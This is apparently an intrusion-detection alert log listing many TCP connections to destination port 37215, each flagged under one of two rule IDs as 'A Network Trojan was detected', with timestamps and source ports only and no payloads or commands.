          Timestamp:06/09/24-16:33:40.818937
          SID:2829579
          Source Port:48424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720442
          SID:2829579
          Source Port:44690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.991412
          SID:2829579
          Source Port:35230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538573
          SID:2829579
          Source Port:55966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302272
          SID:2829579
          Source Port:46040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.222948
          SID:2829579
          Source Port:59420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.989637
          SID:2829579
          Source Port:36696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.905278
          SID:2835222
          Source Port:58126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472352
          SID:2835222
          Source Port:42436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946495
          SID:2835222
          Source Port:58860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029805
          SID:2829579
          Source Port:46704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.564869
          SID:2835222
          Source Port:43510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289594
          SID:2829579
          Source Port:52366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.537873
          SID:2835222
          Source Port:45506
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.418962
          SID:2835222
          Source Port:49942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.037494
          SID:2829579
          Source Port:59566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946721
          SID:2829579
          Source Port:37890
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.040588
          SID:2829579
          Source Port:48772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538798
          SID:2829579
          Source Port:32968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.892460
          SID:2829579
          Source Port:59914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.682157
          SID:2835222
          Source Port:51558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478111
          SID:2835222
          Source Port:52678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302428
          SID:2835222
          Source Port:44212
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034979
          SID:2829579
          Source Port:51246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.595858
          SID:2835222
          Source Port:45584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284010
          SID:2829579
          Source Port:56280
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.995814
          SID:2829579
          Source Port:44576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822810
          SID:2835222
          Source Port:58646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.008427
          SID:2829579
          Source Port:51612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.073882
          SID:2835222
          Source Port:37102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945232
          SID:2835222
          Source Port:49942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.908789
          SID:2829579
          Source Port:41348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944341
          SID:2835222
          Source Port:58446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035638
          SID:2829579
          Source Port:40014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.274906
          SID:2835222
          Source Port:48610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.027410
          SID:2829579
          Source Port:33586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289248
          SID:2835222
          Source Port:49760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.598507
          SID:2835222
          Source Port:58148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.292644
          SID:2835222
          Source Port:44596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.075532
          SID:2829579
          Source Port:41264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.267529
          SID:2835222
          Source Port:46774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102116
          SID:2835222
          Source Port:40042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.074694
          SID:2835222
          Source Port:49796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400025
          SID:2835222
          Source Port:49182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.694727
          SID:2835222
          Source Port:52976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822072
          SID:2835222
          Source Port:52268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.165819
          SID:2829579
          Source Port:44592
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.948898
          SID:2835222
          Source Port:57704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.597358
          SID:2835222
          Source Port:37480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414282
          SID:2829579
          Source Port:36060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.298898
          SID:2835222
          Source Port:53250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.275977
          SID:2835222
          Source Port:36236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163784
          SID:2835222
          Source Port:39502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.284999
          SID:2829579
          Source Port:47978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102446
          SID:2835222
          Source Port:53456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.950191
          SID:2829579
          Source Port:43026
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.246734
          SID:2835222
          Source Port:57140
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.556749
          SID:2835222
          Source Port:49922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.920104
          SID:2829579
          Source Port:40018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.653479
          SID:2835222
          Source Port:42824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103433
          SID:2829579
          Source Port:48238
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.987195
          SID:2835222
          Source Port:42010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206436
          SID:2829579
          Source Port:50086
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.606671
          SID:2829579
          Source Port:48996
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.290226
          SID:2829579
          Source Port:59028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.282229
          SID:2829579
          Source Port:37398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.916640
          SID:2829579
          Source Port:43788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.921875
          SID:2829579
          Source Port:49070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168302
          SID:2829579
          Source Port:36008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.036066
          SID:2835222
          Source Port:53742
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.595875
          SID:2835222
          Source Port:39106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.902401
          SID:2829579
          Source Port:41860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.275948
          SID:2829579
          Source Port:58880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.559497
          SID:2835222
          Source Port:35556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820925
          SID:2829579
          Source Port:43000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.272314
          SID:2835222
          Source Port:51376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.253339
          SID:2829579
          Source Port:52528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823661
          SID:2835222
          Source Port:56302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567496
          SID:2829579
          Source Port:46154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.417431
          SID:2829579
          Source Port:50646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928536
          SID:2835222
          Source Port:33218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.676227
          SID:2835222
          Source Port:56976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399666
          SID:2835222
          Source Port:47154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926275
          SID:2829579
          Source Port:50928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644185
          SID:2835222
          Source Port:57560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.465402
          SID:2835222
          Source Port:52284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.918242
          SID:2835222
          Source Port:58156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865035
          SID:2829579
          Source Port:48186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818112
          SID:2829579
          Source Port:49720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987798
          SID:2835222
          Source Port:54946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.925293
          SID:2835222
          Source Port:56054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414178
          SID:2835222
          Source Port:59934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716646
          SID:2829579
          Source Port:37400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223890
          SID:2835222
          Source Port:58368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.246744
          SID:2835222
          Source Port:44478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.252988
          SID:2829579
          Source Port:37446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821457
          SID:2835222
          Source Port:53922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.569440
          SID:2829579
          Source Port:58556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.283846
          SID:2829579
          Source Port:43394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.418193
          SID:2835222
          Source Port:32896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823010
          SID:2829579
          Source Port:41064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539765
          SID:2835222
          Source Port:46956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.632691
          SID:2829579
          Source Port:58370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.312684
          SID:2829579
          Source Port:41542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928128
          SID:2835222
          Source Port:42822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.037755
          SID:2835222
          Source Port:41536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944424
          SID:2829579
          Source Port:56528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418131
          SID:2835222
          Source Port:52702
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.697770
          SID:2829579
          Source Port:60230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946028
          SID:2835222
          Source Port:55894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.667616
          SID:2829579
          Source Port:54472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.292303
          SID:2835222
          Source Port:41520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206288
          SID:2835222
          Source Port:42274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.291594
          SID:2835222
          Source Port:56192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.079471
          SID:2829579
          Source Port:50650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.207012
          SID:2835222
          Source Port:44970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.598190
          SID:2829579
          Source Port:39798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645137
          SID:2829579
          Source Port:46288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643333
          SID:2829579
          Source Port:60456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397181
          SID:2835222
          Source Port:44348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720462
          SID:2835222
          Source Port:44664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.475935
          SID:2829579
          Source Port:58312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.561990
          SID:2829579
          Source Port:50724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720287
          SID:2835222
          Source Port:36548
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.395976
          SID:2829579
          Source Port:34178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.661016
          SID:2829579
          Source Port:39080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.989389
          SID:2829579
          Source Port:42108
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.893885
          SID:2829579
          Source Port:34328
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.306604
          SID:2829579
          Source Port:38160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716780
          SID:2835222
          Source Port:41440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035066
          SID:2835222
          Source Port:51658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821869
          SID:2829579
          Source Port:57178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986392
          SID:2829579
          Source Port:57538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.012746
          SID:2829579
          Source Port:45752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165268
          SID:2829579
          Source Port:35804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104446
          SID:2835222
          Source Port:57720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.602736
          SID:2829579
          Source Port:56606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206364
          SID:2835222
          Source Port:50184
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.693954
          SID:2835222
          Source Port:52614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718816
          SID:2829579
          Source Port:45962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645562
          SID:2835222
          Source Port:60952
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.467071
          SID:2829579
          Source Port:48610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.097055
          SID:2829579
          Source Port:36818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.901984
          SID:2835222
          Source Port:44758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.864442
          SID:2835222
          Source Port:48178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.003641
          SID:2835222
          Source Port:43134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.133939
          SID:2835222
          Source Port:34894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.904553
          SID:2829579
          Source Port:55666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397805
          SID:2829579
          Source Port:42692
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644281
          SID:2829579
          Source Port:36366
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.031721
          SID:2829579
          Source Port:43728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.156856
          SID:2835222
          Source Port:37528
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.593719
          SID:2835222
          Source Port:39462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163300
          SID:2835222
          Source Port:58412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028703
          SID:2829579
          Source Port:46482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033105
          SID:2835222
          Source Port:59550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166886
          SID:2829579
          Source Port:52990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.951498
          SID:2835222
          Source Port:49686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923148
          SID:2835222
          Source Port:40168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558805
          SID:2829579
          Source Port:35454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.251392
          SID:2829579
          Source Port:37998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945947
          SID:2835222
          Source Port:58484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.099680
          SID:2835222
          Source Port:58372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.915767
          SID:2829579
          Source Port:52066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.224309
          SID:2829579
          Source Port:60586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.075399
          SID:2829579
          Source Port:40638
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398115
          SID:2835222
          Source Port:41276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719749
          SID:2829579
          Source Port:41338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399695
          SID:2829579
          Source Port:54348
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.130797
          SID:2829579
          Source Port:44960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.540253
          SID:2835222
          Source Port:40154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.031583
          SID:2829579
          Source Port:59294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.860340
          SID:2829579
          Source Port:36062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166274
          SID:2835222
          Source Port:46570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.243863
          SID:2835222
          Source Port:35400
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.165380
          SID:2829579
          Source Port:48338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288228
          SID:2829579
          Source Port:46208
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.415793
          SID:2829579
          Source Port:45338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.166379
          SID:2835222
          Source Port:58374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284938
          SID:2835222
          Source Port:38950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.918082
          SID:2835222
          Source Port:46150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.080569
          SID:2835222
          Source Port:48426
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718360
          SID:2829579
          Source Port:41144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946466
          SID:2835222
          Source Port:48976
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.951462
          SID:2829579
          Source Port:60748
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.921077
          SID:2835222
          Source Port:40600
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.563488
          SID:2829579
          Source Port:36032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.921814
          SID:2835222
          Source Port:58436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302418
          SID:2835222
          Source Port:54358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.651580
          SID:2829579
          Source Port:56300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820394
          SID:2835222
          Source Port:36088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248673
          SID:2835222
          Source Port:35494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.651336
          SID:2829579
          Source Port:57432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.471730
          SID:2829579
          Source Port:45614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.996448
          SID:2829579
          Source Port:40892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944430
          SID:2829579
          Source Port:60074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539209
          SID:2829579
          Source Port:49422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720099
